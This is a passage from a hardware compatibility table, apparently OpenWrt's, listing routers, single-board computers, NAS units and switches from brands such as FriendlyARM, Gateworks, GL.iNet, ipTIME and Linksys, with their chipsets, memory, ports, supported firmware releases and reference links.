167 | Router | FriendlyARM | NanoPi R2S | v1 | Available 2021 | 21.02.3 | Rockchip RK3328 | 1300 | 4 | microSDHC | 1024 | – | 2 | – | – | none | – | 1x 2.0 | https://wiki.friendlyarm.com/wiki/index.php/NanoPi_R2S | nanopi_r2s | https://forum.openwrt.org/t/nanopi-r2s-is-a-great-openwrt-device/ | View/Edit data | ||
168 | Single Board Computer | FriendlyARM | NanoPi R4S | Available 2022 | snapshot | Rockchip RK3399 | 2000 | 6 | microSD | 4096 | – | 2 | – | – | None | – | 1x 2.0 header, 1x USB-C (power), 2x 3.0 | https://www.friendlyelec.com/index.php?route=product/product&path=69&product_id=284 | nanopi_r4s_v1 | https://forum.openwrt.org/t/nanopi-r4s-rk3399-4g-is-a-great-new-openwrt-device/79143 | View/Edit data | |||
169 | Single Board Computer | FriendlyARM | ZeroPi | Available 2021 | 21.02.3 | Allwinner H3 | 1200 | 4 | microSDHC | 512 | – | 1 | – | – | – | – | 1x 2.0, 1x µUSB (power) | http://wiki.friendlyarm.com/wiki/index.php/ZeroPi | View/Edit data | |||||
170 | Single Board Computer | FriendlyARM | NanoPi NEO Air | unknown 2022 | 21.02.3 | Allwinner H3 | 1200 | 4 | 8192 eMMC, microSDHC | 512 | – | – | b/g/n | – | AMPAK AP6212 | – | 1x OTG | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_NEO_Air | View/Edit data | |||||
171 | Single Board Computer | FriendlyARM | NanoPi R1S H5 | unknown 2022 | snapshot | Allwinner H5 | ¿ | 4 | microSD | 512 | – | 2 | ¿ | ¿ | ¿ | – | 1x 2.0, 1x µUSB (power) | https://www.friendlyelec.com/index.php?route=product/product&path=69&product_id=274 | View/Edit data | |||||
172 | WiFi Router | Gainstrong | MiniBox | v3.2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 550 | 1 | 16 | 128 | 2 | – | b/g/n | a/n | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x 2.0, 1x µUSB (power) | http://www.gainstrong.cn/product/minibox-v3-2-2/ | View/Edit data | ||||
173 | other | Gainstrong | Oolite | v5.2 | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 5 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x 2.0 | http://www.gainstrong.cn/product/oolite-v5-2/ | View/Edit data | ||||
174 | Single Board Computer | Gateworks | Ventana GW5520 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 800 | 2 | 256NAND | 512 | – | 2 | b/g/n | a/n/ac | 2x mini-PCIe | – | 2x 2.0 | http://www.gateworks.com/product/item/ventana-gw5520-single-board-computer | gateworks | View/Edit data | ||||
175 | Single Board Computer | Gateworks | Newport GW6400 | unknown 2022 | snapshot | Cavium CN8020 | 800 | 2 | 8192 | 1024 | – | 5 | – | – | 3x mini-PCIe | – | 1x 3.0, 2x 2.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
176 | Single Board Computer | Gateworks | Ventana GW5410 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 1000 | 4 | 256NAND | 1024 | – | 2 | b/g/n | a/n/ac | 6x mini-PCIe | – | 1x 2.0, 1x OTG | http://www.gateworks.com/product/item/ventana-gw5410-network-processor | gateworks | View/Edit data | ||||
177 | Single Board Computer | Gateworks | Ventana GW5400 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 1000 | 4 | 256NAND | 1024 | – | 2 | b/g/n | a/n/ac | 6x mini-PCIe | – | 1x 2.0, 1x OTG | http://www.gateworks.com/product/item/ventana-gw5400-network-processor | gateworks | View/Edit data | ||||
178 | Single Board Computer | Gateworks | Ventana GW5530 | Available 2020 | 21.02.3 | NXP i.MX6 | 800 | 2 | 256 | 512 | – | – | – | – | 1x mini-PCIe | Mobile Wireless/Cellular network | 1x OTG | http://www.gateworks.com/product/item/ventana-gw5530-single-board-computer | gateworks | View/Edit data | ||||
179 | Single Board Computer | Gateworks | Newport GW6100 | unknown 2022 | snapshot | Cavium CN8021 | 800 | 2 | 8192 | 1024 | – | 1 | – | – | 1x mini-PCIe | – | 1x 2.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
180 | Single Board Computer | Gateworks | Newport GW6200 | unknown 2022 | snapshot | Cavium CN8021 | 800 | 2 | 8192 | 1024 | – | 2 | – | – | 2x mini-PCIe | – | 1x 2.0, 1x 3.0 | http://www.gateworks.com/octeon-tx-single-board-computers-gateworks-newport | gateworks | View/Edit data | ||||
181 | Single Board Computer | Gateworks | Newport GW6300 | unknown 2022 | snapshot | Cavium CN8020 | 800 | 2 | 8192 | 1024 | – | 2 | – | – | 3x mini-PCIe | – | 1x 3.0, 2x 2.0 | http://www.gateworks.com/product/item/newport-gw6300-single-board-computer | gateworks | View/Edit data | ||||
182 | Single Board Computer | Gateworks | Ventana GW5100 | unknown 2022 | 21.02.3 | Freescale i.MX 6 | 800 | 2 | 256NAND | 512 | – | 1 | b/g/n | a/n/ac | 1x mini-PCIe | – | 1x OTG | http://www.gateworks.com/product/item/ventana-gw5100-network-processor | gateworks | View/Edit data | ||||
183 | Single Board Computer | Gateworks | Ventana GW5200 | unknown 2022 | 17.01.4 | ¿ | Freescale i.MX 6 | 800 | 2 | 256NAND | 512 | – | 1 | b/g/n | a/n/ac | 2x mini-PCIe | – | 1x OTG | http://www.gateworks.com/product/item/ventana-gw5200-network-processor | gateworks | View/Edit data | |||
184 | Single Board Computer | Gateworks | Ventana GW5220 | unknown 2022 | 17.01.4 | ¿ | Freescale i.MX 6 | 800 | 2 | 256NAND | 512 | – | 1 | b/g/n | a/n/ac | 2x mini-PCIe | – | 1x OTG | http://www.gateworks.com/product/item/ventana-gw5200-network-processor | gateworks | View/Edit data | |||
185 | Single Board Computer | Gateworks | Ventana GW5300 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 800 | 2 | 256NAND | 1024 | – | 2 | b/g/n | a/n/ac | 4x mini-PCIe | – | 1x 2.0, 1x OTG | http://www.gateworks.com/product/item/ventana-gw5300-network-processor | gateworks | View/Edit data | ||||
186 | Single Board Computer | Gateworks | Ventana GW5310 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 800 | 2 | 256NAND | 1024 | – | 2 | b/g/n | a/n/ac | 4x mini-PCIe | – | 1x 2.0, 1x OTG | http://www.gateworks.com/product/item/ventana-gw5310-network-processor | gateworks | View/Edit data | ||||
187 | Single Board Computer | Gateworks | Ventana GW5510 | unknown 2022 | 17.01.4 | Freescale i.MX 6 | 800 | 2 | 256NAND | 512 | – | – | b/g/n | a/n/ac | 1x mini-PCIe | – | 1x OTG | http://www.gateworks.com/product/item/ventana-gw5510-single-board-computer | gateworks | View/Edit data | ||||
188 | WiFi Router | GeHua | GHL-R-001 | unknown 2022 | 19.07.0 | MediaTek MT7621AT | 880 | 2 | 32 | 512 | – | 4 | ¿ | ¿ | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | View/Edit data | ||||||
189 | WiFi AP | GL.iNet | GL-AP1300 | Available 2020 | 21.02.3 | Qualcomm IPQ4018 | 717 | 4 | 128NAND, 4 | 256 | – | 2 | b/g/n | a/n/ac | MU-MIMO | Qualcomm IPQ4018 | – | – | https://www.gl-inet.com/products/gl-ap1300/ | gl-ap1300 | View/Edit data | |||
190 | Travel Router | GL.iNet | GL-AR300M-Lite | v1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 1 | – | b/g/n | – | 2×2 | Qualcomm Atheros QCA9531 | – | 1x 2.0 | https://docs.gl-inet.com/en/3/hardware/ar300m/ | gl-ar300m_lite | View/Edit data | ||
191 | WiFi Router | GL.iNet | GL-AR300M | v1.4.0 | Available 2020 | 21.02.3 | must be forced into booting from NOR flash, NAND flash not supported until after 19.07.x | Qualcomm Atheros QCA9531 | 650 | 1 | 128NAND, 16 | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | 1x 2.0 | https://www.gl-inet.com/products/gl-ar300m/ | gl-ar300m | https://forum.openwrt.org/t/gl-ar300m-sysupgrade-problem/1812, https://forum.openwrt.org/t/howto-upgrade-the-preinstalled-openwrt-lede-17-01-firmware-in-the-gl-ar300m-router/21129 | View/Edit data | |
192 | Travel Router | GL.iNet | GL-AR750 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 3 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | 1x 2.0 | https://www.gl-inet.com/ar750/ | gl-ar750 | View/Edit data | ||||
193 | Travel Router | GL.iNet | GL-AR750S | v1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 128NAND, 16, microSDXC | 128 | – | 3 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9887 | – | 1x 2.0 | https://www.gl-inet.com/products/gl-ar750s/ | gl-ar750s | View/Edit data | |||
194 | WiFi Router | GL.iNet | GL-B1300 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4028 | 717 | 4 | 32 | 256 | – | 3 | b/g/n | a/n/ac | Detachable antennas are inside the case | Qualcomm Atheros IPQ4028 | – | 1x 3.0, 1x Header | https://www.gl-inet.com/b1300/ | gl-b1300 | View/Edit data | |||
195 | Modem | GL.iNet | GL-E750 | v1 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 128NAND | 128 | 1 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | LTE | 1x 2.0 | https://www.gl-inet.com/products/gl-e750/ | gl-e750 | View/Edit data | |||
196 | WiFi Router | GL.iNet | GL-MT300N | v2 | Available 2020 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16 | 128 | 2 | – | b/g/n | – | MediaTek MT7628AN | – | 1x 2.0, 1x µUSB (power) | https://www.gl-inet.com/mt300n-v2/ | gl-mt300n_v2 | View/Edit data | |||
197 | Travel Router | GL.iNet | GL-MT1300 (Beryl) | v1 | Available 2021 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32, microSD | 256 | – | 3 | b/g/n | a/n/ac | MediaTek MT7615D | – | 1x 3.0, 1x USB-C (power) | https://www.gl-inet.com/products/gl-mt1300/ | gl-mt1300_v1 | View/Edit data | |||
198 | Router | GL.iNet | GL-MV1000 (Brume) | Available 2020 | 21.02.3 | Marvell Armada 3700LP 88F3720 | 1000 | 2 | 16, 8192 eMMC, microSDXC | 1024 | – | 3 | – | – | – | – | 1x 2.0, 1x 3.0 | https://www.gl-inet.com/products/gl-mv1000/ | gl-mv1000 | View/Edit data | ||||
199 | WiFi Router | GL.iNet | GL-S1300 | v1 | Available 2020 | 21.02.3 | Qualcomm IPQ4029 | 717 | 4 | 16, 8192 eMMC | 512 | – | 3 | b/g/n | a/n/ac | Qualcomm IPQ4029 | – | 1x 3.0 | https://www.gl-inet.com/products/gl-s1300/ | gl-s1300_v1 | View/Edit data | |||
200 | WiFi Router | GL.iNet | GL-X300B | v1 | Available 2021 | snapshot | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | LTE | 1x 2.0 | https://www.gl-inet.com/products/gl-x300b/ | gl-x300b | View/Edit data | |||
201 | WiFi Router | GL.iNet | GL-X750 (Spitz) | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16, microSDXC | 128 | 2 | – | b/g/n | a/n/ac | for wifi internal antennas only; external antennas are for 4G LTE | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | Mobile Wireless/Cellular network | 1x 2.0 | https://www.gl-inet.com/products/gl-x750/ | gl-x750 | View/Edit data | |||
202 | Travel Router | GL.iNet | microuter-N300 | Available 2020 | 21.02.0 | MediaTek MT7628NN | 580 | 1 | 16 | 128 | 1 | – | b/g/n | – | MT7628NN | – | – | https://www.gl-inet.com/products/microuter-n300/ | microuter-n300 | View/Edit data | ||||
203 | WiFi Router | GL.iNet | GL-MV1000W (Brume-W) | Available 2020 | 21.02.3 | WiFI | Marvell Armada 3700LP 88F3720 | 1000 | 2 | 16, 8192 eMMC, microSDXC | 1024 | – | 3 | b/g/n | – | RTL8192EU via internal USB | – | 1x 3.0 | https://www.gl-inet.com/products/gl-mv1000/ | gl-mv1000 | View/Edit data | |||
204 | WiFi Router | GL.iNet | GL-B2200 | Available 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 16, 8192 eMMC | 512 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9886 | – | 1x USB-C (power) | https://www.gl-inet.com/products/gl-b2200/ | View/Edit data | |||||
205 | WiFi Router | GL.iNet | GL-XE300 | Available 2022 | snapshot | Qualcomm Atheros QCA9531 | 650 | 1 | 128NAND, 16, microSDXC | 128 | 2 | – | b/g/n | – | Qualcomm Atheros QCA9531 | LTE | 1x 2.0 | https://www.gl-inet.com/products/gl-xe300/ | gl-xe300 | View/Edit data | ||||
206 | Single Board Computer | Globalscale | ESPRESSObin-Ultra | unknown 2020 | 21.02.3 | Marvell Armada 3700LP 88F3720 | 1200 | 2 | 4, 8192 eMMC, microSD | 1024 | – | 5 | b/g/n | a/n/ac | Marvell 88W8997 | – | 1x 2.0, 1x 3.0 | https://www.globalscaletechnologies.com/p-88-espressobin-ultra.aspx | View/Edit data | |||||
207 | Single Board Computer | Globalscale | Mirabox | unknown 2022 | 21.02.3 | Marvell Armada 370 88F6707 | 1200 | 1 | 1024 eMMC | 1024 | – | 3 | b/g/n | – | Marvell 88W8787 | – | 2x 3.0 | View/Edit data | ||||||
208 | Single Board Computer | Globalscale | MOCHAbin | Available 2022 | snapshot | Armada 7040 quad core with 4x ARM72 cores at 1.4Ghz | 1.4 | 4 | more than 8GB eMMC | more than 4GB | – | 4 | ¿ | ¿ | ¿ | – | 2x 3.0 | https://globalscaletechnologies.com/product/mochabin/ | mochabin | https://forum.openwrt.org/t/mochabin-5g-kickstarter/108178 | View/Edit data | |||
209 | other | Globalscale | Sheevaplug | unknown 2021 | snapshot | Marvell 88F6281 | 1200 | 1 | 512NAND, SD | 512 | – | 1 | – | – | – | – | 1x 2.0 | http://¿ | sheevaplug | View/Edit data | ||||
210 | Single Board Computer | Globalscale | ESPRESSObin | V7 | Available 2022 | 19.07.7 | Marvell Armada 3700LP 88F3720 | 1200 | 2 | 4096, eMMC, microSDHC | 1024 | – | 3 | – | – | 1x mini-PCIe | – | 1x 2.0, 1x 3.0 | http://espressobin.net/ | espressobin_v7 | View/Edit data | |||
211 | NAS | GnuBee | Personal Cloud Two | Available 2022 | 21.02.3 | see git-commit | MediaTek MT7621AT | 880 | 2 | 32, SD | 512 | – | 3 | – | – | – | – | 1x 3.0, 2x 2.0 | https://www.crowdsupply.com/gnubee/personal-cloud-2 | View/Edit data | ||||
212 | NAS | GnuBee | Personal Cloud One | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 512 | – | 2 | – | – | – | – | 1x 3.0, 2x 2.0 | https://www.crowdsupply.com/gnubee/personal-cloud-1 | View/Edit data | |||||
213 | other | HAK5 | WiFi Pineapple Mark 7 | Available 2021 | 21.02.3 | MediaTek MT7628 | 580 | 1 | 2048 eMMC, 32 | 256 | ¿ | ¿ | b/g/n | – | MediaTek MT7601, MediaTek MT7628 | – | 1x 2.0 | https://shop.hak5.org/products/wifi-pineapple | View/Edit data | |||||
214 | other | Hi-Link | HLK-7628N | Available 2022 | 21.02.3 | MediaTek MT7628NN | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7628NN | – | – | View/Edit data | ||||||
215 | other | Hi-Link | HLK-7688A | Available 2021 | 21.02.3 | MediaTek MT7688AN | 580 | 1 | 32 | 128 | 5 | – | b/g/n | – | MediaTek MT7688AN | – | 1x 2.0 | http://www.hlktech.net/product_detail.php?ProId=69 | View/Edit data | |||||
216 | WiFi Router | HiWiFi/Gee | HC5761A | unknown 2022 | 21.02.3 | SD card | MediaTek MT7628AN | 580 | 1 | 16, SD | 128 | 3 | – | b/g/n | a/n/ac | MediaTek MT7610EN, MediaTek MT7628AN | – | – | View/Edit data | |||||
217 | WiFi Router | HiWiFi/Gee | HC5861B | unknown 2022 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16 | 128 | 5 | – | b/g/n | a/n/ac | MediaTek MT7612EN, MediaTek MT7628AN | – | ¿ | View/Edit data | ||||||
218 | WiFi Router | HUMAX | E10 | unknown 2022 | snapshot | MediaTek MT7621A | ¿ | ¿ | 16 | 128 | – | 2 | b/g/n | a/n/ac | MediaTek MT7615 | ¿ | 1x 2.0 | http://¿ | View/Edit data | |||||
219 | WiFi Router | I-O Data | WNPR2600G | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.iodata.jp/product/network/wnlan/wnpr2600g/index.htm | View/Edit data | |||||
220 | WiFi Router | I-O Data | WN-DX1200GR | unknown 2021 | 21.02.3 | Wifi 5GHz partly | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7613BE | – | – | https://www.iodata.jp/product/network/wnlan/wn-dx1200gr/ | View/Edit data | ||||
221 | WiFi Router | I-O Data | WN-AC1600DGR3 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9557 | 720 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9557, Qualcomm Atheros QCA9880 | – | 1x 2.0 | https://www.iodata.jp/product/network/wnlan/wn-ac1600dgr3/ | wn-ac1600dgr | View/Edit data | ||||
222 | WiFi Router | I-O Data | WN-AX2033GR | Available 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615 | – | – | https://www.iodata.jp/product/network/wnlan/wn-ax2033gr/ | wn-ax2033gr | View/Edit data | ||||
223 | WiFi Router | I-O Data | WN-DX2033GR | unknown 2021 | snapshot | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615 | – | – | http://¿ | View/Edit data | |||||
224 | Switch | I-O Data | BSH-G24MB | unknown 2022 | snapshot | Realtek RTL8382M | 500 | 1 | 16 | 128 | – | 24 | – | – | – | – | https://www.iodata.jp/lib/product/b/6306.htm | View/Edit data | ||||||
225 | Router | IEI | PUZZLE-M901 | V1 | Available 2021 | 21.02.3 | Marvell CN9130 | 2200 | 4 | 4096 | 4096 | – | 6 | – | – | – | ¿ | – | https://www.ieiworld.com/en/product/model.php?II=747 | puzzle-m901 | View/Edit data | |||
226 | Router | IEI | PUZZLE-M902 | V1 | Available 2021 | 21.02.3 | Marvell CN9130 | 2200 | 4 | 4096 | 4096 | – | 6 | – | – | None | – | 1x 3.0 | https://www.ieiworld.com/en/product/model.php?II=748 | puzzle-m902 | View/Edit data | |||
227 | Switch | INABA | Abaniact AML2-17GP | unknown 2021 | snapshot | Realtek RTL8382M | 500 | 1 | 32 | 128 | – | 17 | – | – | – | – | https://www.inaba.co.jp/abaniact/L2SW/lineup/ | View/Edit data | ||||||
228 | WiFi Router | Intellidesign | Hyrax PCP-100 | A | unknown 2022 | 18.06.9 | Atmel ATSAMA5D35 | 536 | 1 | 256NAND | 256 | 2 | – | b/g/n | – | CSR WF111 | Mobile Wireless/Cellular network | Yes | http://intellidesign.com.au/?portfolio=hyrax-pcp-100-iot-platform | hyrax | View/Edit data | |||
229 | WiFi Router | ipTIME | A8004T | Available 2021 | 21.02.3 | WiFi 2.4 Ghz | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | 4×4 MU-MIMO | MediaTek MT7615E | – | 1x 3.0 | http://iptime.com/iptime/?page_id=11&pf=3&page=&pt=375&pd=1 | a8004t | View/Edit data | ||
230 | WiFi Router | ipTIME | A6ns-M | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | 1x 3.0 | https://iptime.com/iptime/?page_id=11&pf=3&page=&pt=348&pd=1 | View/Edit data | |||||
231 | WiFi Router | ipTIME | A1004ns | Available 2020 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7610EN, MediaTek MT7620A | – | 1x 2.0 | https://iptime.com/iptime/?page_id=11&pf=3&page=&pt=283&pd=1 | View/Edit data | |||||
232 | WiFi Router | ipTIME | A3004T | Available 2021 | snapshot | MT7621A | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | radio0 will not work with 5GHz, use radio1 instead. | MT7615E | – | 1x 3.0 | http://iptime.com/iptime/?page_id=11&pf=3&page=&pt=535&pd=1 | View/Edit data | ||||
233 | WiFi Router | ipTIME | A3004NS-dual | unknown 2022 | snapshot | MediaTek MT7621 | 880 | ¿ | 16 | 256 | 5 | – | b/g/n | a/n/ac | MediaTek MT7602E, MediaTek MT7612E | ¿ | 1x 3.0 | http://¿ | View/Edit data | |||||
234 | Router | ipTIME | T5004 | unknown 2022 | snapshot | MediaTek MT7621AT | ¿ | ¿ | 128NAND | 128 | – | 5 | – | – | – | ¿ | ¿ | http://¿ | View/Edit data | |||||
235 | WiFi Router | ipTIME | A6004NS-M | unknown 2022 | snapshot | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615E | ¿ | 1x 3.0 | http://¿ | View/Edit data | |||||
236 | WiFi Router | ipTIME | AX2004M | unknown 2022 | snapshot | MediaTek MT7621A | ¿ | ¿ | 128NAND | 256 | – | 5 | ¿ | ¿ | MediaTek MT7915D | ¿ | 1x 3.0 | http://¿ | View/Edit data | |||||
237 | NAS | ipTIME | NAS1 | unknown 2022 | snapshot | Marvell 88F6281 | ¿ | ¿ | 16 | 256 | – | 1 | – | – | – | ¿ | 1x 2.0 | http://¿ | View/Edit data | |||||
238 | NAS | ipTIME | NAS1dual | unknown 2022 | snapshot | Marvell 88F6820 | ¿ | ¿ | 64 | 2048 | – | 2 | – | – | – | ¿ | 1x 3.0 | http://¿ | View/Edit data | |||||
239 | WiFi Router | ipTIME | A3002MESH | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 128 | ¿ | ¿ | ¿ | ¿ | MediaTek MT7615D | ¿ | ¿ | http://¿ | View/Edit data | |||||
240 | WiFi Router | JCG | JHR-AC876M | unknown 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | jhr-ac876m | View/Edit data | |||||
241 | WiFi Router | JCG | Q20 | unknown 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128 | 256 | – | 3 | ¿ | ¿ | MediaTek MT7915 | – | – | http://¿ | View/Edit data | |||||
242 | WiFi Router | JCG | Y2 | unknown 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | http://¿ | View/Edit data | |||||
243 | WiFi Router | Joy-IT | JT-OR750i | unknown 2021 | 21.02.3 | Qualcomm Atheros QCA9531 | 550 | 1 | 16 | 128 | 4 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9887 | – | – | http://¿ | jt-or750i | View/Edit data | ||||
244 | Single Board Computer | Lamobo | BananaPi R1 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | microSD | 1024 | – | 5 | b/g/n | – | Realtek RTL8192CU | – | 1x 2.0, 1x µUSB (power) | http://www.banana-pi.org/r1.html | bananapi_r1 | View/Edit data | ||||
245 | Single Board Computer | Lemaker | Banana Pro | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | microSD | 1024 | – | 1 | b/g/n | – | Broadcom BCM43362 | – | 1x OTG, 2x 2.0 | http://www.lemaker.org/product-bananapro-index.html | banana_pro | View/Edit data | ||||
246 | Single Board Computer | Lemaker | Banana Pi | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | SD | 1024 | – | 1 | – | – | – | – | 1x OTG, 1x µUSB (power), 2x 2.0 | http://www.lemaker.org/product-bananapi-index.html | banana_pi | View/Edit data | ||||
247 | WiFi Router | Letv | LBA-047-CH | unknown 2022 | snapshot | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 3 | – | b/g/n | – | Qualcomm Atheros QCA9531 | – | – | http://¿ | lba-047-ch | View/Edit data | ||||
248 | Single Board Computer | Libre Computer | ALL-H3-CC H5 | Available 2021 | 21.02.3 | Allwinner H5 | 1000 | 4 | eMMC, microSD | 2048 | 1 | – | – | – | – | – | 4x 2.0 | https://libre.computer/products/boards/all-h3-cc/ | View/Edit data | |||||
249 | WiFi Router | Librerouter | LibreRouter | v1 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9582 (mini-PCIe) | – | 2x 2.0 | https://librerouter.org/ | View/Edit data | ||||
250 | Single Board Computer | Linksprite | pcDuino3 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 4096NAND, microSD | 1024 | 1 | – | – | – | – | – | 1x 2.0 | http://www.linksprite.com/linksprite-pcduino3/ | pcduino3 | View/Edit data | ||||
251 | WiFi Router | Linksys | EA8100 | v1 | unknown 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/in/wireless-routers/traditional-routers/max-stream-dual-band-wifi-5-router/p/p-ea8100/ | ea8100_v1 | View/Edit data | |||
252 | WiFi Router | Linksys | EA8500 | v1 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac | 4×4 | Qualcomm Atheros QCA9980 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/p-ea8500/ | ea8500 | https://forum.openwrt.org/viewtopic.php?pid=310426 | View/Edit data | |
253 | WiFi Router | Linksys | E5600 | v1 | unknown 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MIMO | MediaTek MT7603, MediaTek MT7613E | – | – | https://www.linksys.com/us/p/P-E5600/ | e5600 | https://forum.openwrt.org/t/adding-openwrt-support-for-linksys-e5600/78586 | View/Edit data | |
254 | WiFi Router | Linksys | E8450 | Available 2020 | snapshot | MediaTek MT7622BV | 1350 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac/ax | MediaTek MT7622BV, MediaTek MT7915E | – | 1x 2.0 | https://www.linksys.com/us/p/P-E8450/ | e8450 | https://forum.openwrt.org/t/belkin-rt3200-linksys-e8450-wifi-ax-discussion/94302 | View/Edit data | |||
255 | WiFi Router | Linksys | EA6350 | v3 (civic) | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 710 | 4 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | 2×2 MU-MIMO | Qualcomm Atheros IPQ4018 | – | 1x 3.0 | https://www.linksys.com/p/P-EA6350/ | ea6350_v3 | http://forum.openwrt.org/t/add-support-for-linksys-ea6350-v3/18907 | View/Edit data | |
256 | WiFi Router | Linksys | EA7300 | v2 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615N | – | 1x 3.0 | https://www.linksys.com/us/p/P-EA7300/ | ea7300_v2 | View/Edit data | |||
257 | WiFi Router | Linksys | EA7500 | V1 | Available 2020 | 21.02.3 | Qualcomm IPQ8064 | 1400 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9982, Qualcomm Atheros QCA9983 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-EA7500/ | https://forum.openwrt.org/t/linksys-ea7500-v1-and-openwrt/58205 | View/Edit data | |||
258 | WiFi Router | Linksys | EA8100 | v2 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/vn/wireless-routers/traditional-routers/linksys-ea8100-max-stream-dual-band-wifi-5-router/p/p-ea8100/ | ea8100_v2 | View/Edit data | |||
259 | WiFi Router | Linksys | EA8300 | v1 | Available 2022 | 21.02.3 | Bluetooth | Qualcomm IPQ4019 | 717 | 4 | 256NAND | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9886 | – | 1x 3.0 | https://www.linksys.com/us/p/P-EA8300/ | ea8300 | View/Edit data | ||
